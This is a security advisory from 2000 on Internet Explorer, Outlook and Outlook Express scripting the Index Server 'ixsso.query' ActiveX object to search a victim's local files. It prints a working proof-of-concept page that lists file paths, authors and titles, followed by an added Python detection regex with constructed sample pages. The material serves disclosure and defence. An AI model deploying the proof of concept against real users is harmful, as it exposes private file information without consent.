Microsoft IE 5.x, Outlook, Outlook Express, and Windows 2000 with Index Server Vulnerable to Remote File Searching


Reported November 10, 2000 by Georgi Guninski

VERSIONS AFFECTED
  • Microsoft Internet Explorer 5.x
  • Microsoft Outlook Express
  • Microsoft Outlook
  • Windows 2000 with Microsoft Index Server 

DESCRIPTION

The "ixsso.query" ActiveX object (the Microsoft Index Server query object) can be instantiated and driven from script in a web page or HTML e-mail. As a result, Internet Explorer 5.x, Outlook, Outlook Express, and Windows 2000 with Microsoft Index Server are vulnerable to unauthorized file searching: a remote page can run Index Server queries against the local catalog and read back file names, paths, titles and authors of matching documents.

DEMONSTRATION

Georgi Guninski made the following code available:

--------indexserv1.html-------------------------------------------

<INPUT TYPE="BUTTON" VALUE="Search" onclick="g(document.all.query.value)">
<INPUT TYPE="BUTTON" VALUE="Find *.txt files" onclick="g('@filename = *.txt')">

<SCRIPT>
function g(q1)
{
  // The issue: ordinary page script can create the Index Server query
  // object and run a search of the local catalog.
  qu=new ActiveXObject("ixsso.query");
  qu.Catalog="System";
  //qu.query="@contents name";
  //qu.query="#filename .htm or name near test";
  //qu.query='@filename = *.doc ';
  qu.query=q1;
  qu.Columns="filename, path, doctitle, doccomments, docauthor, size";
  rs=qu.CreateRecordset("nonsequential");
  //alert("Records: "+rs.RecordCount);
  // Results are written into the page's first frame; the frame element
  // itself is not part of the published snippet.
  doc=window.frames[0].document;
  doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+"");
  doc.writeln("<TABLE BORDER=2>");
  doc.writeln("<TR><TD>Path</TD><TD>size</TD><TD>DocAuthor</TD><TD>DocTitle</TD></TR>");
  while (!rs.EOF)
  {
    doc.writeln("<TR><TD><A TARGET='_blank' HREF='file://"+rs("Path")+"'>"+rs("Path")+"</A></TD><TD>"+rs("size")+"</TD><TD>"+rs("DocAuthor")+"</TD><TD>"+rs("DocTitle")+"</TD></TR>");
    rs.MoveNext();
  }
  doc.writeln("</TABLE>");
}
//setTimeout("g()",1000);
</SCRIPT>

---------------------------------------------------------------------
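A content-filter check for the instantiation pattern used in the demonstration above, added here as an example (it is not part of Guninski's code or the original advisory). The sample pages are constructed; the check tolerates case, whitespace and quote variations of the ProgID while ignoring plain mentions in prose.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample inputs (not from the advisory): one page that creates the
# object exactly as the demonstration does, one that varies case, spacing and
# quoting, and one benign page that only mentions the name in text.
SAMPLES = {
    "demo.html": '<SCRIPT>qu=new ActiveXObject("ixsso.query");qu.Catalog="System";</SCRIPT>',
    "obfuscated.html": "<script>var o = new  activexobject ( 'IXSSO.Query' ) ;</script>",
    "benign.html": "<p>The ixsso.query object is discussed in the advisory.</p>",
}

# Matches script that instantiates the Index Server query object by ProgID.
# ProgIDs are case-insensitive and authors vary spacing and quote style, so
# the pattern is tolerant of those; it requires the ProgID inside a string
# argument to ActiveXObject so that prose mentions do not fire.
INSTANTIATION = re.compile(
    r"""(?:new\s+)?ActiveXObject\s*\(\s*(['"])\s*ixsso\.query\s*\1\s*\)""",
    re.IGNORECASE,
)


def find_ixsso_instantiations(html: str) -> List[Tuple[int, str]]:
    """Return (line_number, matched_text) for each ixsso.query instantiation."""
    hits = []
    for lineno, line in enumerate(html.splitlines(), start=1):
        for match in INSTANTIATION.finditer(line):
            hits.append((lineno, match.group(0)))
    return hits


def scan(pages: Dict[str, str]) -> Dict[str, List[Tuple[int, str]]]:
    """Scan a name->content mapping and keep only the pages with a hit."""
    findings = {}
    for name, content in pages.items():
        hits = find_ixsso_instantiations(content)
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        for lineno, text in hits:
            print(f"{name}:{lineno}: {text}")
```

A gateway or mail filter would run the same check over message bodies and attachments; pages that set the kill bit on the control still benefit from knowing which content tried to use it.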

VENDOR RESPONSE

Georgi Guninski reported this issue to Microsoft on November 6, 2000. I contacted Microsoft as well and they are working on a patch. Unfortunately, Microsoft was only given four days to address the issue and has not completed the patch.

CREDIT
Discovered by Georgi Guninski
